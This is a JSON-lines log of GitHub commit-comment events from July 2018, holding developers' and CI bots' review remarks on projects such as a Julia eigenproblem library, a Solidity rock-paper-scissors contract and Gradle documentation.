{"id":"8021070975","type":"CommitCommentEvent","actor":{"login":"eringh"},"repo":{"name":"nep-pack/NonlinearEigenproblems.jl"},"payload":{"comment":{"id":29840075,"position":null,"line":null,"path":null,"commit_id":"59b2c1285d08c953525418fd986ed6e40c415598","created_at":"2018-07-26T08:01:15Z","updated_at":"2018-07-26T08:01:15Z","author_association":"CONTRIBUTOR","body":"I have looked into this now. You are right that there is a (potentially) sub-optimal type-enforcement in the newton methods. Perhaps we should look over it.\r\n\r\nHowever, I looked into the `compute_Mlincomb` code as well, and it also has type-problems. The broadcast `broadcast(*,V,w.'),2)` on line 828 does not create a vector but a matrix (with one column!). At this point it seems as if z is promoted to a matrix (related to the discussion in #44). Also ` z-λ*view(V,:,1:1)` on line 831 creates a matrix (with one column!).\r\n\r\nThe error occurs because it is undefined how to cast a matrix to a vector, although it is trivial in this case. There are two ways of handling it.\r\n\r\nEither change the mentioned lines to \r\n`z+=Av[j+1]*vec(sum(broadcast(*,V,w.'),2));` and\r\n`z-λ*view(V,:,1)`\r\n\r\nor change line 319 in augnewton (and corresponding lines in other methods) from\r\n`tempvec = Array{T,1}(lin_solve(linsolver, z, tol=tol));`\r\nto\r\n`tempvec =vec((lin_solve(linsolver, z, tol=tol)));`\r\n\r\nPersonally I prefer the first since it feels cleaner. I believe that `compute_Mlincomb` should return a vector. That feels more natural to me."}},"created_at":"2018-07-26T08:01:15Z"}
{"id":"8021073801","type":"CommitCommentEvent","actor":{"login":"jirfag"},"repo":{"name":"alecthomas/gometalinter"},"payload":{"comment":{"id":29840084,"position":5,"line":87,"path":"README.md","commit_id":"445bce7956d2cd3b792db2ce3323d4fd31aa7d80","created_at":"2018-07-26T08:01:46Z","updated_at":"2018-07-26T08:01:46Z","author_association":"NONE","body":"s/goesc/gosec"}},"created_at":"2018-07-26T08:01:46Z"}
{"id":"8021074429","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"micahu/splitter"},"payload":{"comment":{"id":29840085,"position":89,"line":57,"path":"test/account-mgmt.test.js","commit_id":"2acad21f51fa93e00be42aa5e1fab947a0a13127","created_at":"2018-07-26T08:01:53Z","updated_at":"2018-07-26T08:01:53Z","author_association":"NONE","body":"No, don't compare ether amounts. You need to compare wei amounts. Ether amounts are most likely approximations, while wei amounts are exact."}},"created_at":"2018-07-26T08:01:53Z"}
{"id":"8021079665","type":"CommitCommentEvent","actor":{"login":"stamina84"},"repo":{"name":"openscholar/openscholar"},"payload":{"comment":{"id":29840091,"position":5,"line":5,"path":"openscholar/modules/os/os.info","commit_id":"bd5f0d7e3a22fc66234c8f7959abcde54ba2758b","created_at":"2018-07-26T08:02:58Z","updated_at":"2018-07-26T08:02:58Z","author_association":"NONE","body":"Thanks for helping, i reverted the info file dependencies part and leave recaptcha modifications.\r\n\r\nThis file generated from feature recreate :("}},"created_at":"2018-07-26T08:02:58Z"}
{"id":"8021084787","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"micahu/splitter"},"payload":{"comment":{"id":29840099,"position":82,"line":50,"path":"test/account-mgmt.test.js","commit_id":"2acad21f51fa93e00be42aa5e1fab947a0a13127","created_at":"2018-07-26T08:04:08Z","updated_at":"2018-07-26T08:04:08Z","author_association":"NONE","body":"Choosing to overwrite a \"before\" balance with an \"after\" balance is a poor choice. This is a setup for a future bug. Make everything `const`."}},"created_at":"2018-07-26T08:04:08Z"}
{"id":"8021086255","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"micahu/splitter"},"payload":{"comment":{"id":29840102,"position":89,"line":57,"path":"test/account-mgmt.test.js","commit_id":"2acad21f51fa93e00be42aa5e1fab947a0a13127","created_at":"2018-07-26T08:04:27Z","updated_at":"2018-07-26T08:04:27Z","author_association":"NONE","body":"It will also be much clearer:\r\n\r\n```javascript\r\nexpect(rec1BalanceBefore.plus(weiAmount.div(2)).toString(10)).isEqualTo(rec1BalanceAfter.toString(10));\r\n```"}},"created_at":"2018-07-26T08:04:27Z"}
{"id":"8021086469","type":"CommitCommentEvent","actor":{"login":"neuroscr"},"repo":{"name":"majestrate/llarp"},"payload":{"comment":{"id":29840105,"position":16,"line":36,"path":"daemon/dns.cpp","commit_id":"bbe0634edce05f160b690f367b06558ef76475ba","created_at":"2018-07-26T08:04:29Z","updated_at":"2018-07-26T08:04:29Z","author_association":"CONTRIBUTOR","body":"pls don't, I can't use 1.1.1.1 my ISP blocks it"}},"created_at":"2018-07-26T08:04:29Z"}
{"id":"8021088033","type":"CommitCommentEvent","actor":{"login":"ankur684105"},"repo":{"name":"ankur684105/Cognitive"},"payload":{"comment":{"id":29840110,"position":null,"line":null,"path":null,"commit_id":"d9afb197e4071c7bcfc62e93be7e52ecd287db64","created_at":"2018-07-26T08:04:50Z","updated_at":"2018-07-26T08:04:50Z","author_association":"OWNER","body":"This is practice commit to test project preRequisite"}},"created_at":"2018-07-26T08:04:50Z"}
{"id":"8021089130","type":"CommitCommentEvent","actor":{"login":"ankur684105"},"repo":{"name":"ankur684105/Cognitive"},"payload":{"comment":{"id":29840114,"position":2,"line":2,"path":"anotherFile","commit_id":"d9afb197e4071c7bcfc62e93be7e52ecd287db64","created_at":"2018-07-26T08:05:06Z","updated_at":"2018-07-26T08:05:06Z","author_association":"OWNER","body":"Why this line we can change?"}},"created_at":"2018-07-26T08:05:06Z"}
{"id":"8021091345","type":"CommitCommentEvent","actor":{"login":"Travisss"},"repo":{"name":"high-speed-downloader/high-speed-downloader"},"payload":{"comment":{"id":29840117,"position":null,"line":null,"path":null,"commit_id":"b1890ae92e98a312ad491de990b5717303b7a727","created_at":"2018-07-26T08:05:35Z","updated_at":"2018-07-26T08:05:35Z","author_association":"NONE","body":"求更新\r\n"}},"created_at":"2018-07-26T08:05:35Z"}
{"id":"8021092841","type":"CommitCommentEvent","actor":{"login":"LuLamp"},"repo":{"name":"LuLamp/twitter-feed"},"payload":{"comment":{"id":29840121,"position":5,"line":5,"path":"wercker.yml","commit_id":"886e930aab8238e8ea6a6c3a393c0dd350ec622e","created_at":"2018-07-26T08:05:54Z","updated_at":"2018-07-26T08:05:54Z","author_association":"OWNER","body":"s"}},"created_at":"2018-07-26T08:05:54Z"}
{"id":"8021109494","type":"CommitCommentEvent","actor":{"login":"pledbrook"},"repo":{"name":"gradle/gradle"},"payload":{"comment":{"id":29840136,"position":28,"line":42,"path":"subprojects/docs/src/docs/userguide/working_with_files.adoc","commit_id":"f0faeeeb114b162b365e4eb6acd6cd42e956c46b","created_at":"2018-07-26T08:09:31Z","updated_at":"2018-07-26T08:09:31Z","author_association":"CONTRIBUTOR","body":"This is a horrible hack. An example is not a section. Now the paragraphs after an example are in a new section.\r\n\r\nI experimented a little and found this as a potential solution:\r\n\r\n    .Unpacking a ZIP file\r\n    ====\r\n    [source.multi-language-sample,groovy]\r\n    .build.gradle\r\n    ----\r\n    include::{samplesPath}/userguide/files/archives/build.gradle[tag=unpack-archive-example]\r\n    ----\r\n    ====\r\n\r\nThis results in:\r\n\r\n![screenshot 2018-07-26 09 05 34](https://user-images.githubusercontent.com/19075/43249707-52372fdc-90b3-11e8-975c-44c14f9fc976.png)\r\n\r\nThe filename can be styled with `.exampleblock .listingblock > .title`. What do you think? Note that it appears the examples get an automatic number using this approach."}},"created_at":"2018-07-26T08:09:31Z"}
{"id":"8021109666","type":"CommitCommentEvent","actor":{"login":"kobe2000"},"repo":{"name":"Tencent/ncnn"},"payload":{"comment":{"id":29840137,"position":null,"line":null,"path":null,"commit_id":"1e4eaeeacd6ab351b1d5d2669650013307e547b3","created_at":"2018-07-26T08:09:33Z","updated_at":"2018-07-26T08:09:33Z","author_association":"NONE","body":"great!"}},"created_at":"2018-07-26T08:09:33Z"}
{"id":"8021109947","type":"CommitCommentEvent","actor":{"login":"dastanabeuov"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29840138,"position":null,"line":null,"path":null,"commit_id":"28abe27ad4f597627f609a821058babe267c5afb","created_at":"2018-07-26T08:09:37Z","updated_at":"2018-07-26T08:09:37Z","author_association":"OWNER","body":"ispravil..."}},"created_at":"2018-07-26T08:09:37Z"}
{"id":"8021111156","type":"CommitCommentEvent","actor":{"login":"pledbrook"},"repo":{"name":"gradle/gradle"},"payload":{"comment":{"id":29840140,"position":28,"line":42,"path":"subprojects/docs/src/docs/userguide/working_with_files.adoc","commit_id":"f0faeeeb114b162b365e4eb6acd6cd42e956c46b","created_at":"2018-07-26T08:09:52Z","updated_at":"2018-07-26T08:09:52Z","author_association":"CONTRIBUTOR","body":"This would be a prime candidate for a macro too I expect."}},"created_at":"2018-07-26T08:09:52Z"}
{"id":"8021112275","type":"CommitCommentEvent","actor":{"login":"chriscatuk"},"repo":{"name":"mulesoft-labs/net-tools-api"},"payload":{"comment":{"id":29840141,"position":null,"line":null,"path":null,"commit_id":"389f03d3ca0b8968428c40f747ad1f099bc1b20c","created_at":"2018-07-26T08:10:07Z","updated_at":"2018-07-26T08:10:07Z","author_association":"NONE","body":"fix #1 \r\nfix #2"}},"created_at":"2018-07-26T08:10:07Z"}
{"id":"8021112401","type":"CommitCommentEvent","actor":{"login":"leducson"},"repo":{"name":"leducson/test"},"payload":{"comment":{"id":29840142,"position":5,"line":9,"path":"app/controllers/users_controller.rb","commit_id":"787fda0a30563e32efeb087d663952530c6e37c4","created_at":"2018-07-26T08:10:09Z","updated_at":"2018-07-26T08:10:09Z","author_association":"OWNER","body":"format aaa la format gi, sai cho nay"}},"created_at":"2018-07-26T08:10:09Z"}
{"id":"8021114191","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29840145,"position":null,"line":null,"path":null,"commit_id":"a1cf4e7574f66e1880f4bec488770e5547413197","created_at":"2018-07-26T08:10:31Z","updated_at":"2018-07-26T08:10:31Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-26T08:10:31Z"}
{"id":"8021114725","type":"CommitCommentEvent","actor":{"login":"MikeUnwalla"},"repo":{"name":"languagetool-org/languagetool"},"payload":{"comment":{"id":29840146,"position":null,"line":null,"path":null,"commit_id":"b727c6b54530efcea3659375b546e7eef8093265","created_at":"2018-07-26T08:10:38Z","updated_at":"2018-07-26T08:10:38Z","author_association":"CONTRIBUTOR","body":"Doh. The title should be \"Remove spellings for unknown word 'improvize'\". "}},"created_at":"2018-07-26T08:10:38Z"}
{"id":"8021115551","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":29840148,"position":6,"line":1667,"path":"resources/definitions/fdmprinter.def.json","commit_id":"5cb5e63dcc41d887c9e6bfa49832fae110611238","created_at":"2018-07-26T08:10:50Z","updated_at":"2018-07-26T08:10:50Z","author_association":"CONTRIBUTOR","body":"Yeah thanks.\r\n\r\nYou're paying an awful lot of attention here! \r\n\r\nFixed: 9c6b676660bca4d2f8e69afb844f4fc35dbd5b97"}},"created_at":"2018-07-26T08:10:50Z"}
{"id":"8021120031","type":"CommitCommentEvent","actor":{"login":"Rooman"},"repo":{"name":"littlepony99/online_shop"},"payload":{"comment":{"id":29840154,"position":16,"line":16,"path":"src/main/java/com/study/onlineshop/service/services/CurrencyService.java","commit_id":"559e42d587feb2d489eef1bbbb83bcdbe4ff6538","created_at":"2018-07-26T08:11:47Z","updated_at":"2018-07-26T08:11:47Z","author_association":"NONE","body":"bomb"}},"created_at":"2018-07-26T08:11:47Z"}
{"id":"8021120150","type":"CommitCommentEvent","actor":{"login":"plty"},"repo":{"name":"dawidjaja/dacovalinebot"},"payload":{"comment":{"id":29840156,"position":null,"line":null,"path":null,"commit_id":"58dd60be452d0afb58cd19236c3e909255d5ed16","created_at":"2018-07-26T08:11:48Z","updated_at":"2018-07-26T08:11:48Z","author_association":"NONE","body":"gaaman jir... wtf, token sama secret dipush ke github\r\n\r\n# SAVAGE KM NAK "}},"created_at":"2018-07-26T08:11:48Z"}
{"id":"8021120919","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/RockPaperScissors"},"payload":{"comment":{"id":29840157,"position":50,"line":55,"path":"contracts/RockPaperScissors.sol","commit_id":"70845492a821aac28b876a273b950da611307999","created_at":"2018-07-26T08:11:58Z","updated_at":"2018-07-26T08:11:58Z","author_association":"NONE","body":"Well. Imagine this scenario1:\r\n\r\n* game is created\r\n* player1 commits with wager\r\n* player2 never does anything\r\n\r\nNow the game needs to be \"cleaned\", who gets player1 wager? The owner?\r\n\r\nScenario2:\r\n\r\n* game is created\r\n* player1 commits with wager\r\n* player2 commits with wager\r\n* player1 reveals\r\n* player2 can see player1 reveal and now knows player2 has lost the game\r\n* player2 never reveals, why waste the gas to lose?\r\n\r\nNow the game needs to be cleaned, who gets the wagers? The owner?"}},"created_at":"2018-07-26T08:11:58Z"}
{"id":"8021124434","type":"CommitCommentEvent","actor":{"login":"ErikMinekus"},"repo":{"name":"lhc70000/iina"},"payload":{"comment":{"id":29840163,"position":null,"line":null,"path":null,"commit_id":"8bedac9fd88f84b9180727e9cba1af1d08648346","created_at":"2018-07-26T08:12:42Z","updated_at":"2018-07-26T08:12:42Z","author_association":"CONTRIBUTOR","body":"Thanks :)"}},"created_at":"2018-07-26T08:12:42Z"}
{"id":"8021125958","type":"CommitCommentEvent","actor":{"login":"SicariusNoctis"},"repo":{"name":"SicariusNoctis/eagle-eye-tracker"},"payload":{"comment":{"id":29840168,"position":86,"line":60,"path":"rpi/stepper.py","commit_id":"e50f44855d8867704da9a8bf83bb61e0788d6a56","created_at":"2018-07-26T08:13:02Z","updated_at":"2018-07-26T08:13:02Z","author_association":"OWNER","body":"One easy way to fix it is by putting the velocity = accel * dt at the top. (You'll need to keep track of `last_run_time` as well.)\r\n\r\n```\r\ncurr_time = time.perf_counter()\r\ndt = curr_time - self.prev_run_time\r\nself.prev_run_time = curr_time\r\n\r\nif not self._is_initialized:\r\n    self._is_initialized = True\r\n    return\r\n\r\nself.velocity += dt * self.accel\r\n\r\nif self.distance < 1.0:\r\n    return\r\n\r\nself._step()\r\n```\r\n"}},"created_at":"2018-07-26T08:13:02Z"}
{"id":"8021126038","type":"CommitCommentEvent","actor":{"login":"neemxyang"},"repo":{"name":"acgotaku/BaiduExporter"},"payload":{"comment":{"id":29840169,"position":null,"line":null,"path":null,"commit_id":"b6e4b4ffea63c17705269661b502f65f8e54e5fa","created_at":"2018-07-26T08:13:02Z","updated_at":"2018-07-26T08:13:02Z","author_association":"NONE","body":"!!!!!!!!!!!!!!!!!!!!!!!!!!!!"}},"created_at":"2018-07-26T08:13:02Z"}
{"id":"8021128479","type":"CommitCommentEvent","actor":{"login":"kirandeshmukh"},"repo":{"name":"joshsoftware/the_hunger_terminal"},"payload":{"comment":{"id":29840175,"position":10,"line":10,"path":"app/views/orders/load_terminal.html.haml","commit_id":"4e9c3b0f7aa79f65c4e6d71a728abdc5e46113c3","created_at":"2018-07-26T08:13:33Z","updated_at":"2018-07-26T08:13:33Z","author_association":"COLLABORATOR","body":"instead of using inline css, you can add this styling in css file of terminals and use it here"}},"created_at":"2018-07-26T08:13:33Z"}
{"id":"8021129202","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/RockPaperScissors"},"payload":{"comment":{"id":29840177,"position":61,"line":64,"path":"contracts/RockPaperScissors.sol","commit_id":"70845492a821aac28b876a273b950da611307999","created_at":"2018-07-26T08:13:42Z","updated_at":"2018-07-26T08:13:42Z","author_association":"NONE","body":"I do not see in the code how player1 is prevented from overwriting his commit before the deadline."}},"created_at":"2018-07-26T08:13:42Z"}
{"id":"8021137958","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/RockPaperScissors"},"payload":{"comment":{"id":29840198,"position":111,"line":100,"path":"contracts/RockPaperScissors.sol","commit_id":"70845492a821aac28b876a273b950da611307999","created_at":"2018-07-26T08:15:33Z","updated_at":"2018-07-26T08:15:33Z","author_association":"NONE","body":"`'D'` is converted to `bytes32` because that is what the compare function takes in."}},"created_at":"2018-07-26T08:15:33Z"}
{"id":"8021138975","type":"CommitCommentEvent","actor":{"login":"sp193"},"repo":{"name":"Jay-Jay-OPL/OPL-Daily-Builds"},"payload":{"comment":{"id":29840199,"position":null,"line":null,"path":null,"commit_id":"16e56f41900992eb5b6a65fc522528961e636038","created_at":"2018-07-26T08:15:47Z","updated_at":"2018-07-26T08:15:47Z","author_association":"NONE","body":"I have a question: Why don't you just do this to update your repository:\r\n```\r\ngit pull https://github.com/ifcaro/open-ps2-loader\r\n```\r\n\r\nI know your repository has diverged because you have additional commits, but they were (weren't they?) done a long time ago.\r\nSo you should be able to fast-forward your HEAD without needing to manually merge each and every commit, each time."}},"created_at":"2018-07-26T08:15:47Z"}
{"id":"8021143913","type":"CommitCommentEvent","actor":{"login":"majestrate"},"repo":{"name":"majestrate/llarp"},"payload":{"comment":{"id":29840209,"position":16,"line":36,"path":"daemon/dns.cpp","commit_id":"bbe0634edce05f160b690f367b06558ef76475ba","created_at":"2018-07-26T08:16:50Z","updated_at":"2018-07-26T08:16:50Z","author_association":"OWNER","body":"this should be configurable on runtime\n\nOn Thu, Jul 26, 2018 at 01:04:30AM -0700, Ryan Tharp wrote:\n> pls don't, I can't use 1.1.1.1 my ISP blocks it\n> \n> -- \n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly or view it on GitHub:\n> https://github.com/majestrate/llarp/commit/bbe0634edce05f160b690f367b06558ef76475ba#commitcomment-29840105\n"}},"created_at":"2018-07-26T08:16:50Z"}
{"id":"8021145507","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29840212,"position":null,"line":null,"path":null,"commit_id":"c6d06d8d0f59b201a6f7c792af17763a724a9816","created_at":"2018-07-26T08:17:09Z","updated_at":"2018-07-26T08:17:09Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-26T08:17:09Z"}
{"id":"8021149133","type":"CommitCommentEvent","actor":{"login":"JustPilz"},"repo":{"name":"Cordrear/theMovieDBProj"},"payload":{"comment":{"id":29840219,"position":2,"line":2,"path":"src/components/MovieDBApp/index.js","commit_id":"30e5ad5815342652c1cfb6abd07cfb135161f3ce","created_at":"2018-07-26T08:17:56Z","updated_at":"2018-07-26T08:17:56Z","author_association":"NONE","body":"выпилить эту строку"}},"created_at":"2018-07-26T08:17:56Z"}
{"id":"8021150369","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/RockPaperScissors"},"payload":{"comment":{"id":29840222,"position":96,"line":137,"path":"contracts/RockPaperScissors.sol","commit_id":"34f737617e1a0b960ee931aefad396cf7a53d541","created_at":"2018-07-26T08:18:11Z","updated_at":"2018-07-26T08:18:11Z","author_association":"NONE","body":"So there is a `pure` function for the players, but the contract does not use this `pure` function when verifying? In other words you are not giving the player any guarantee that it will work... You have 2 sources of truth."}},"created_at":"2018-07-26T08:18:11Z"}
{"id":"8021165425","type":"CommitCommentEvent","actor":{"login":"ezio84"},"repo":{"name":"ezio84/abc_frameworks_base"},"payload":{"comment":{"id":29840261,"position":null,"line":null,"path":null,"commit_id":"8c6ddb291fea393a7b1ca5c8b5ad0925bc1d2184","created_at":"2018-07-26T08:21:16Z","updated_at":"2018-07-26T08:21:16Z","author_association":"OWNER","body":"This commit works well as expected.\r\nKeep in mind that my code is to show track info when a player is playing on the phone itself (or remotely like Spotify), but it's not intended to show track info when an external source is playing a song (like the original pixel feature).\r\nIf you want that, just pick the Now Playing commits from Carbon rom, they adapted Google closed source code to replicate the original behavior."}},"created_at":"2018-07-26T08:21:16Z"}
{"id":"8021167064","type":"CommitCommentEvent","actor":{"login":"pepakriz"},"repo":{"name":"pepakriz/phpstan-exception-rules"},"payload":{"comment":{"id":29840267,"position":null,"line":null,"path":null,"commit_id":"461c803a7aa1a4b7303c6bd43c533d83c72a1de6","created_at":"2018-07-26T08:21:36Z","updated_at":"2018-07-26T08:21:36Z","author_association":"OWNER","body":"It would be nice. If you dive into it, preserve `uncheckedExceptions` option instead of `ignoredExceptions` and use the following logic:\r\n\r\n1) every exception is unchecked by default\r\n2) every exception in `checkedExceptions` section must not be subtype of some exception listed in `uncheckedExceptions` section\r\n3) every exception in `uncheckedExceptions` must be subtype of some checked exception\r\n\r\nMaybe when `checkedExceptions` will not be defined, it should mean you want to check everything."}},"created_at":"2018-07-26T08:21:36Z"}
{"id":"8021167233","type":"CommitCommentEvent","actor":{"login":"Djuliuss"},"repo":{"name":"Djuliuss/RockPaperScissors"},"payload":{"comment":{"id":29840268,"position":50,"line":55,"path":"contracts/RockPaperScissors.sol","commit_id":"70845492a821aac28b876a273b950da611307999","created_at":"2018-07-26T08:21:38Z","updated_at":"2018-07-26T08:21:38Z","author_association":"OWNER","body":"The outcome of both scenarios would be the same. Player one would be the winner and the wager(s) would send to him. The reason is player2 will have failed to reach status V which is a sine qua non condition to win the game. Here:\r\n\r\n```\r\n```\r\n```function declareWinner(uint gameID) view public returns (bool draw, address winner) {\r\n        require(revealFinished(gameID));\r\n        [...]\r\n        // if one of the players has failed to reach status V (Verified), he loses the game\r\n        if (compareStrings(status0,'V') && !compareStrings(status1,'V')) {\r\n            return (false,player0); \r\n        } \r\n        if (!compareStrings(status0,'V') && compareStrings(status1,'V')) {\r\n            return (false,player1);\r\n        }```"}},"created_at":"2018-07-26T08:21:38Z"}
{"id":"8021176454","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"kristalls/thinkneticaRoR"},"payload":{"comment":{"id":29840277,"position":5,"line":2,"path":"lesson2/fibonacci.rb","commit_id":"ce782f4354aad8d4f1ec3af2bf33cb76b35766ba","created_at":"2018-07-26T08:23:33Z","updated_at":"2018-07-26T08:23:33Z","author_association":"NONE","body":"вот есть такой вариант довольно лаконичный (6 строк):\r\n```ruby { .line-numbers }\r\nfibbonacci = [0, 1]\r\nnext_element = 1\r\n\r\nwhile next_element < 100\r\n  fibbonacci << next_element\r\n  next_element = fibbonacci[-1] + fibbonacci[-2]\r\nend\r\n```"}},"created_at":"2018-07-26T08:23:33Z"}
{"id":"8021178699","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29840279,"position":null,"line":null,"path":null,"commit_id":"42d8b1b147cff3f626d0768cb44dc1a8be156873","created_at":"2018-07-26T08:24:00Z","updated_at":"2018-07-26T08:24:00Z","author_association":"NONE","body":"158270028_Issue#6422 (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1698 of 1698 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-42d8b1b147cff3f626d0768cb44dc1a8be156873-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-42d8b1b147cff3f626d0768cb44dc1a8be156873-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-42d8b1b147cff3f626d0768cb44dc1a8be156873-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.05%25-green.png)</a>\n"}},"created_at":"2018-07-26T08:24:00Z"}
{"id":"8021180226","type":"CommitCommentEvent","actor":{"login":"FraGag"},"repo":{"name":"sonicretro/sa_tools"},"payload":{"comment":{"id":29840283,"position":16,"line":73,"path":"SALVL/MainForm.cs","commit_id":"42cab37646bbf8b52cfdd5221b807e31fc4e491d","created_at":"2018-07-26T08:24:18Z","updated_at":"2018-07-26T08:24:18Z","author_association":"MEMBER","body":"`d3ddevice` is a managed resource (which I suppose handles unmanaged resources on its own), so `d3ddevice.Dispose()` should only be called when `disposing` is `true`. When it's `false`, it means this method is being called from `Finalize()`, which is called from the GC. The GC can finalize objects in any order, so `d3ddevice` might already be finalized when `Dispose` is called here. It might not hurt to call `Dispose` on `Device` again, but it's unnecessary.\r\n\r\nIn reality, it probably doesn't matter much because `MainForm` might never actually be finalized, since the program terminates shortly after the `MainForm` is closed and disposed."}},"created_at":"2018-07-26T08:24:18Z"}
{"id":"8021182088","type":"CommitCommentEvent","actor":{"login":"via123"},"repo":{"name":"youshutong2080/shutongFlow"},"payload":{"comment":{"id":29840285,"position":null,"line":null,"path":null,"commit_id":"15c9f872149bcab7cf2d2398b5959deb06e15c43","created_at":"2018-07-26T08:24:41Z","updated_at":"2018-07-26T08:24:41Z","author_association":"NONE","body":"thx u for alway solving the problems i met"}},"created_at":"2018-07-26T08:24:41Z"}
{"id":"8021210886","type":"CommitCommentEvent","actor":{"login":"meleg"},"repo":{"name":"nep-pack/NonlinearEigenproblems.jl"},"payload":{"comment":{"id":29840324,"position":null,"line":null,"path":null,"commit_id":"59b2c1285d08c953525418fd986ed6e40c415598","created_at":"2018-07-26T08:30:14Z","updated_at":"2018-07-26T08:30:14Z","author_association":"CONTRIBUTOR","body":"I agree with you, compute_Mlincomb should return a vector. If you want do this modification "}},"created_at":"2018-07-26T08:30:14Z"}
{"id":"8021225276","type":"CommitCommentEvent","actor":{"login":"Djuliuss"},"repo":{"name":"Djuliuss/RockPaperScissors"},"payload":{"comment":{"id":29840352,"position":96,"line":137,"path":"contracts/RockPaperScissors.sol","commit_id":"34f737617e1a0b960ee931aefad396cf7a53d541","created_at":"2018-07-26T08:32:58Z","updated_at":"2018-07-26T08:32:58Z","author_association":"OWNER","body":"There is another function that verifies the commits, and both functions call keccak256 , which is the ultimate source of truth for both functions.\r\nI don't know how to merge both functions in just one as they do different thing, the first one (create hash) returns a hash, the second one a (validate commit) bool. The input parameters are different, too."}},"created_at":"2018-07-26T08:32:58Z"}
{"id":"8021227263","type":"CommitCommentEvent","actor":{"login":"asbiin"},"repo":{"name":"monicahq/monica"},"payload":{"comment":{"id":29840354,"position":38,"line":38,"path":"database/migrations/2018_07_08_104306_update-timestamps-timezone.php","commit_id":"f5888accd595c4b628e86f0f46195d02727e6797","created_at":"2018-07-26T08:33:21Z","updated_at":"2018-07-26T08:33:21Z","author_association":"MEMBER","body":"Oh damn, you're right @epicmonkey "}},"created_at":"2018-07-26T08:33:21Z"}
{"id":"8021227735","type":"CommitCommentEvent","actor":{"login":"eringh"},"repo":{"name":"nep-pack/NonlinearEigenproblems.jl"},"payload":{"comment":{"id":29840355,"position":null,"line":null,"path":null,"commit_id":"59b2c1285d08c953525418fd986ed6e40c415598","created_at":"2018-07-26T08:33:26Z","updated_at":"2018-07-26T08:33:26Z","author_association":"CONTRIBUTOR","body":"Question is where is what it he best way to implement it.\r\n\r\nEither as I suggested above, or to keep your implementation and simply vectorize it in the verly last step. My suggested implementation anyway does a lot of vectorizations, which may allocate memory and take time. So perhaps the best thing it simply to do the computations as matrices with one column, and the vectorize just before return."}},"created_at":"2018-07-26T08:33:26Z"}
{"id":"8021227867","type":"CommitCommentEvent","actor":{"login":"neuroscr"},"repo":{"name":"majestrate/llarp"},"payload":{"comment":{"id":29840356,"position":51,"line":34,"path":"vendor/cppbackport-master/lib/filesystem.h","commit_id":"dc021994098d8b925434f96789fb86e26af8c665","created_at":"2018-07-26T08:33:28Z","updated_at":"2018-07-26T08:33:28Z","author_association":"CONTRIBUTOR","body":"this breaks my linux build"}},"created_at":"2018-07-26T08:33:28Z"}
{"id":"8021233216","type":"CommitCommentEvent","actor":{"login":"JustPilz"},"repo":{"name":"Cordrear/theMovieDBProj"},"payload":{"comment":{"id":29840369,"position":4,"line":3,"path":"src/components/Pagination/index.js","commit_id":"30e5ad5815342652c1cfb6abd07cfb135161f3ce","created_at":"2018-07-26T08:34:30Z","updated_at":"2018-07-26T08:34:30Z","author_association":"NONE","body":"не используется в файле => выпилить"}},"created_at":"2018-07-26T08:34:30Z"}
